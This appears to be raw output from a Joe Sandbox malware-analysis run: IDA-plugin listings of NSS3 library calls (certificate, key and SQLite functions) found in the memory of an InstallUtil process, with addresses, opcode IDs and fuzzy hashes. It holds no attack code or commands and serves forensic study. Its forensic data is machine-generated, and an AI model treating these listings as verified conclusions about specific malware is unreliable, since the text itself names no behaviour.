                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                  • String ID: *~l
                                                                                                                  • API String ID: 1595327144-3946691403
                                                                                                                  APIs
                                                                                                                  • PR_SetError.NSS3(FFFFE001,00000000,00000001,00000000,00000000,?,?,6C755DEF,?,?,?), ref: 6C756456
                                                                                                                  • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001,00000001,00000000,00000000,?,?,6C755DEF,?,?,?), ref: 6C756476
                                                                                                                  • CERT_DestroyCertificate.NSS3(00000000,?,?,?,?,?,?,6C755DEF,?,?,?), ref: 6C7564A0
                                                                                                                  • PR_SetError.NSS3(FFFFE020,00000000,00000001,00000000,00000000,?,?,6C755DEF,?,?,?), ref: 6C7564C2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CertificateError$DestroyTemp
                                                                                                                  • String ID: ]ul
                                                                                                                  • API String ID: 3886907618-1500978261
                                                                                                                  APIs
                                                                                                                  • PORT_Alloc_Util.NSS3(00000008,?,6C7A473B,00000000,?,6C797A4F,?), ref: 6C7A459B
                                                                                                                    • Part of subcall function 6C7B0BE0: malloc.MOZGLUE(6C7A8D2D,?,00000000,?), ref: 6C7B0BF8
                                                                                                                    • Part of subcall function 6C7B0BE0: TlsGetValue.KERNEL32(6C7A8D2D,?,00000000,?), ref: 6C7B0C15
                                                                                                                  • TlsGetValue.KERNEL32(?,?,6C7A473B,00000000,?,6C797A4F,?), ref: 6C7A45BF
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C7A473B,00000000,?,6C797A4F,?), ref: 6C7A45D3
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C7A473B,00000000,?,6C797A4F,?), ref: 6C7A45E8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$Alloc_CriticalEnterSectionUnlockUtilmalloc
                                                                                                                  • String ID: Ozyl
                                                                                                                  • API String ID: 2963671366-28087613
                                                                                                                  APIs
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001,?,?,?,?,?,?,?,?,6C6F7915,?,?), ref: 6C82A86D
                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010800,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,6C6F7915,?,?), ref: 6C82A8A6
                                                                                                                  Strings
                                                                                                                  • database corruption, xrefs: 6C82A89B
                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C82A891
                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C82A8A0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _byteswap_ulongsqlite3_log
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                  • API String ID: 912837312-598938438
                                                                                                                  APIs
                                                                                                                  • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C740BDE), ref: 6C740DCB
                                                                                                                  • strrchr.VCRUNTIME140(00000000,0000005C,?,6C740BDE), ref: 6C740DEA
                                                                                                                  • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C740BDE), ref: 6C740DFC
                                                                                                                  • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C740BDE), ref: 6C740E32
                                                                                                                  Strings
                                                                                                                  • %s incr => %d (find lib), xrefs: 6C740E2D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strrchr$Print_stricmp
                                                                                                                  • String ID: %s incr => %d (find lib)
                                                                                                                  • API String ID: 97259331-2309350800
                                                                                                                  APIs
                                                                                                                  • PK11_FreeSymKey.NSS3(?,@]~l,00000000,?,?,6C7D6AC6,?), ref: 6C7FAC2D
                                                                                                                    • Part of subcall function 6C79ADC0: TlsGetValue.KERNEL32(?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE10
                                                                                                                    • Part of subcall function 6C79ADC0: EnterCriticalSection.KERNEL32(?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE24
                                                                                                                    • Part of subcall function 6C79ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C77D079,00000000,00000001), ref: 6C79AE5A
                                                                                                                    • Part of subcall function 6C79ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE6F
                                                                                                                    • Part of subcall function 6C79ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE7F
                                                                                                                    • Part of subcall function 6C79ADC0: TlsGetValue.KERNEL32(?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AEB1
                                                                                                                    • Part of subcall function 6C79ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AEC9
                                                                                                                  • PK11_FreeSymKey.NSS3(?,@]~l,00000000,?,?,6C7D6AC6,?), ref: 6C7FAC44
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]~l,00000000,?,?,6C7D6AC6,?), ref: 6C7FAC59
                                                                                                                  • free.MOZGLUE(8CB6FF01,6C7D6AC6,?,?,?,?,?,?,?,?,?,?,6C7E5D40,00000000,?,6C7EAAD4), ref: 6C7FAC62
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                  • String ID: @]~l
                                                                                                                  • API String ID: 1595327144-730612681
                                                                                                                  APIs
                                                                                                                  • PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C79C5C7
                                                                                                                  • PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C79C603
                                                                                                                  • PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C79C636
                                                                                                                  • PK11_FreeSymKey.NSS3(?), ref: 6C79C6D7
                                                                                                                  • PK11_FreeSymKey.NSS3(?), ref: 6C79C6E1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  APIs
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000,6C887379,00000002,?), ref: 6C7E2493
                                                                                                                  • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C7E24B4
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,?,?,6C887379,00000002,?), ref: 6C7E24EA
                                                                                                                  • PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,6C887379,00000002,?), ref: 6C7E24F5
                                                                                                                  • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,6C887379,00000002,?), ref: 6C7E24FE
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C74EDFD
                                                                                                                  • calloc.MOZGLUE(00000001,00000000), ref: 6C74EE64
                                                                                                                  • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C74EECC
                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C74EEEB
                                                                                                                  • free.MOZGLUE(?), ref: 6C74EEF6
                                                                                                                  APIs
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C86A55C
                                                                                                                  • PR_IntervalNow.NSS3 ref: 6C86A573
                                                                                                                  • PR_IntervalNow.NSS3 ref: 6C86A5A5
                                                                                                                  • _PR_MD_UNLOCK.NSS3(?), ref: 6C86A603
                                                                                                                    • Part of subcall function 6C819890: TlsGetValue.KERNEL32(?,?,?,6C8197EB), ref: 6C81989E
                                                                                                                  • _PR_MD_UNLOCK.NSS3(?), ref: 6C86A636
                                                                                                                  APIs
                                                                                                                  • SECOID_FindOID_Util.NSS3 ref: 6C7544FF
                                                                                                                    • Part of subcall function 6C7B07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C758298,?,?,?,6C74FCE5,?), ref: 6C7B07BF
                                                                                                                    • Part of subcall function 6C7B07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7B07E6
                                                                                                                    • Part of subcall function 6C7B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B081B
                                                                                                                    • Part of subcall function 6C7B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B0825
                                                                                                                  • SECOID_FindOID_Util.NSS3(?), ref: 6C754524
                                                                                                                  • SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C754537
                                                                                                                  • CERT_AddExtensionByOID.NSS3(00000001,?,?,?,00000001), ref: 6C754579
                                                                                                                    • Part of subcall function 6C7541B0: PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C7541BE
                                                                                                                    • Part of subcall function 6C7541B0: PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C7541E9
                                                                                                                    • Part of subcall function 6C7541B0: SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C754227
                                                                                                                    • Part of subcall function 6C7541B0: SECITEM_CopyItem_Util.NSS3(?,-00000018,?), ref: 6C75423D
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C75459C
                                                                                                                  APIs
                                                                                                                  • PORT_ArenaMark_Util.NSS3(?,00000000,00000000,00000000,?,6C75E755,00000000,00000004,?,?), ref: 6C75E5F5
                                                                                                                    • Part of subcall function 6C7B14C0: TlsGetValue.KERNEL32 ref: 6C7B14E0
                                                                                                                    • Part of subcall function 6C7B14C0: EnterCriticalSection.KERNEL32 ref: 6C7B14F5
                                                                                                                    • Part of subcall function 6C7B14C0: PR_Unlock.NSS3 ref: 6C7B150D
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000,?), ref: 6C75E62C
                                                                                                                  • SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000000,?), ref: 6C75E63E
                                                                                                                    • Part of subcall function 6C7AF9A0: PORT_ArenaMark_Util.NSS3(?,00000000,-00000002,?,-00000002,?,6C74F379,?,00000000,-00000002), ref: 6C7AF9B7
                                                                                                                  • PK11_HashBuf.NSS3(?,?,?,?,?,?,?,?), ref: 6C75E65C
                                                                                                                    • Part of subcall function 6C77DDD0: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C77DDEC
                                                                                                                    • Part of subcall function 6C77DDD0: PK11_DigestBegin.NSS3(00000000), ref: 6C77DE70
                                                                                                                    • Part of subcall function 6C77DDD0: PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C77DE83
                                                                                                                    • Part of subcall function 6C77DDD0: HASH_ResultLenByOidTag.NSS3(?), ref: 6C77DE95
                                                                                                                    • Part of subcall function 6C77DDD0: PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C77DEAE
                                                                                                                    • Part of subcall function 6C77DDD0: PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C77DEBB
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000,?), ref: 6C75E68E
                                                                                                                  APIs
                                                                                                                  • PORT_ArenaMark_Util.NSS3(00000000,?,6C753FFF,00000000,?,?,?,?,?,6C751A1C,00000000,00000000), ref: 6C75ADA7
                                                                                                                    • Part of subcall function 6C7B14C0: TlsGetValue.KERNEL32 ref: 6C7B14E0
                                                                                                                    • Part of subcall function 6C7B14C0: EnterCriticalSection.KERNEL32 ref: 6C7B14F5
                                                                                                                    • Part of subcall function 6C7B14C0: PR_Unlock.NSS3 ref: 6C7B150D
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C753FFF,00000000,?,?,?,?,?,6C751A1C,00000000,00000000), ref: 6C75ADB4
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B10F3
                                                                                                                    • Part of subcall function 6C7B10C0: EnterCriticalSection.KERNEL32(?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B110C
                                                                                                                    • Part of subcall function 6C7B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1141
                                                                                                                    • Part of subcall function 6C7B10C0: PR_Unlock.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1182
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B119C
                                                                                                                  • SECITEM_CopyItem_Util.NSS3(00000000,?,6C753FFF,?,?,?,?,6C753FFF,00000000,?,?,?,?,?,6C751A1C,00000000), ref: 6C75ADD5
                                                                                                                    • Part of subcall function 6C7AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7A8D2D,?,00000000,?), ref: 6C7AFB85
                                                                                                                    • Part of subcall function 6C7AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7AFBB1
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C8794B0,?,?,?,?,?,?,?,?,6C753FFF,00000000,?), ref: 6C75ADEC
                                                                                                                    • Part of subcall function 6C7AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8818D0,?), ref: 6C7AB095
                                                                                                                  • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C753FFF), ref: 6C75AE3C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2372449006-0
                                                                                                                  • Opcode ID: 69dcf0a5c7bb6f5eac6b56ce965ac626aa607b54d5fa6174770370e19374b5ff
                                                                                                                  • Instruction ID: dcea579a569e12094ff80be3d64bbe78601eed88b27e8aa25894860d1efc041b
                                                                                                                  • Opcode Fuzzy Hash: 69dcf0a5c7bb6f5eac6b56ce965ac626aa607b54d5fa6174770370e19374b5ff
                                                                                                                  • Instruction Fuzzy Hash: 0E118631E003051BE7109B659E09BBF73BCDF8021CF404638EC1996700FB20E96982F2
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(?,6C7B085A,00000000,?,6C758369,?), ref: 6C7A8821
                                                                                                                  • TlsGetValue.KERNEL32(?,?,6C7B085A,00000000,?,6C758369,?), ref: 6C7A883D
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,6C7B085A,00000000,?,6C758369,?), ref: 6C7A8856
                                                                                                                  • PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C7A8887
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,6C7B085A,00000000,?,6C758369,?), ref: 6C7A8899
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407AD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407CD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407D6
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6D204A), ref: 6C7407E4
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,6C6D204A), ref: 6C740864
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C740880
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,6C6D204A), ref: 6C7408CB
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408D7
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408FB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2759447159-0
                                                                                                                  • Opcode ID: 82b84c1f4ec67df0759db8ca45b4ce6b506c652fa434b6ce1881255165e446ba
                                                                                                                  • Instruction ID: d9cd667e578ee9f7f9c8f7e590cfcbb243ab9092d28bad60ba0a3d9b28de6838
                                                                                                                  • Opcode Fuzzy Hash: 82b84c1f4ec67df0759db8ca45b4ce6b506c652fa434b6ce1881255165e446ba
                                                                                                                  • Instruction Fuzzy Hash: 2F219CB49146458FCB00AFB9C68816ABBF4FF05348F014676DC9497701EB30D496CBD2
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,6C7680DD), ref: 6C7728BA
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,6C7680DD), ref: 6C7728D3
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,6C7680DD), ref: 6C7728E8
                                                                                                                  • DeleteCriticalSection.KERNEL32(?,?,?,?,?,6C7680DD), ref: 6C77290E
                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,6C7680DD), ref: 6C77291A
                                                                                                                    • Part of subcall function 6C769270: DeleteCriticalSection.KERNEL32(?,?,6C775089,?,6C773B70,?,?,?,?,?,6C775089,6C76F39B,00000000), ref: 6C76927F
                                                                                                                    • Part of subcall function 6C769270: free.MOZGLUE(?,?,6C773B70,?,?,?,?,?,6C775089,6C76F39B,00000000), ref: 6C769286
                                                                                                                    • Part of subcall function 6C769270: PL_HashTableDestroy.NSS3(?,6C773B70,?,?,?,?,?,6C775089,6C76F39B,00000000), ref: 6C769292
                                                                                                                    • Part of subcall function 6C768B50: TlsGetValue.KERNEL32(00000000,?,6C770948,00000000), ref: 6C768B6B
                                                                                                                    • Part of subcall function 6C768B50: EnterCriticalSection.KERNEL32(?,?,?,6C770948,00000000), ref: 6C768B80
                                                                                                                    • Part of subcall function 6C768B50: PL_FinishArenaPool.NSS3(?,?,?,?,6C770948,00000000), ref: 6C768B8F
                                                                                                                    • Part of subcall function 6C768B50: PR_Unlock.NSS3(?,?,?,?,6C770948,00000000), ref: 6C768BA1
                                                                                                                    • Part of subcall function 6C768B50: DeleteCriticalSection.KERNEL32(?,?,?,?,6C770948,00000000), ref: 6C768BAC
                                                                                                                    • Part of subcall function 6C768B50: free.MOZGLUE(?,?,?,?,?,6C770948,00000000), ref: 6C768BB8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$Deletefree$EnterUnlockValue$ArenaDestroyFinishHashPoolTable
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3225375108-0
                                                                                                                  • Opcode ID: 610012159b129c52a33b71761720b3449d0d30239c47cc5e5856e7547ef568b5
                                                                                                                  • Instruction ID: 4698826b540e529ffefdc99669ae26e87e8c54fa2172d4c26025bfbb43877fd0
                                                                                                                  • Opcode Fuzzy Hash: 610012159b129c52a33b71761720b3449d0d30239c47cc5e5856e7547ef568b5
                                                                                                                  • Instruction Fuzzy Hash: 062119B5A04A05DBCB10AF79C18C569BBF0FF05358F054969DC9497B00E731E895CBE2
                                                                                                                  APIs
                                                                                                                  • WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6C7E461B,-00000004), ref: 6C7E04DF
                                                                                                                  • TlsGetValue.KERNEL32(?,00000000,?,6C7E461B,-00000004), ref: 6C7E0510
                                                                                                                  • EnterCriticalSection.KERNEL32(ED850FDC), ref: 6C7E0520
                                                                                                                  • PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6C7E461B,-00000004), ref: 6C7E0534
                                                                                                                  • GetLastError.KERNEL32(?,6C7E461B,-00000004), ref: 6C7E0543
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Error$CriticalEnterLastObjectSectionSingleValueWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3052423345-0
                                                                                                                  • Opcode ID: 591a48cb3f17251a98fb3d76ca55b55fa28dc81abfa006b7e08027fd0ea4cb0a
                                                                                                                  • Instruction ID: 8227e86150bf7a12d0be95a9227b9855f93cde57a1941f0a008d9d607aa3a8e5
                                                                                                                  • Opcode Fuzzy Hash: 591a48cb3f17251a98fb3d76ca55b55fa28dc81abfa006b7e08027fd0ea4cb0a
                                                                                                                  • Instruction Fuzzy Hash: 98113A72A041416BDB107B789E08F6937A4EF0A31DF644634E425D39D1EF31D544DBD1
                                                                                                                  APIs
                                                                                                                  • PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C770710), ref: 6C768FF1
                                                                                                                  • PR_CallOnce.NSS3(6C8B2158,6C769150,00000000,?,?,?,6C769138,?,6C770710), ref: 6C769029
                                                                                                                  • calloc.MOZGLUE(00000001,00000000,?,?,6C770710), ref: 6C76904D
                                                                                                                  • memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C770710), ref: 6C769066
                                                                                                                  • PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C770710), ref: 6C769078
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateThread$CallOncecallocmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1176783091-0
                                                                                                                  • Opcode ID: 431a8c15d5aa3d414bb2225900d39f6a36a675ba4df85f1b93cb2ead2c75f9b0
                                                                                                                  • Instruction ID: a38a1fb801ffc7fd85eada409ee55e9a4292aab833ffc58cf0c513e8ff48fcb0
                                                                                                                  • Opcode Fuzzy Hash: 431a8c15d5aa3d414bb2225900d39f6a36a675ba4df85f1b93cb2ead2c75f9b0
                                                                                                                  • Instruction Fuzzy Hash: A311CE61B0021256EB201BAEAE04A7A72A8EB927ACF540531FC88D6F41F752CD45C3E5
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C791E10: TlsGetValue.KERNEL32 ref: 6C791E36
                                                                                                                    • Part of subcall function 6C791E10: EnterCriticalSection.KERNEL32(?,?,?,6C76B1EE,2404110F,?,?), ref: 6C791E4B
                                                                                                                    • Part of subcall function 6C791E10: PR_Unlock.NSS3 ref: 6C791E76
                                                                                                                  • free.MOZGLUE(?,6C77D079,00000000,00000001), ref: 6C77CDA5
                                                                                                                  • PK11_FreeSymKey.NSS3(?,6C77D079,00000000,00000001), ref: 6C77CDB6
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C77D079,00000000,00000001), ref: 6C77CDCF
                                                                                                                  • DeleteCriticalSection.KERNEL32(?,6C77D079,00000000,00000001), ref: 6C77CDE2
                                                                                                                  • free.MOZGLUE(?), ref: 6C77CDE9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1720798025-0
                                                                                                                  • Opcode ID: e5efa8fd0bd9beb481da9e23b26432e1c9b3fe6bf5b804702ae98dae35b4987a
                                                                                                                  • Instruction ID: 37f087b21ee07e7a2c0a20749c30f488f83561c0ede2ec82d722ab37f36a6900
                                                                                                                  • Opcode Fuzzy Hash: e5efa8fd0bd9beb481da9e23b26432e1c9b3fe6bf5b804702ae98dae35b4987a
                                                                                                                  • Instruction Fuzzy Hash: 4311A3B2B01515ABDF10AEA5EE49A9A776CBB0825A7144131E90987E01E732F434C7E1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C7E5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C7E5B56
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7E2CEC
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C7E2D02
                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C7E2D1F
                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C7E2D42
                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C7E2D5B
                                                                                                                  Memory Dump Source
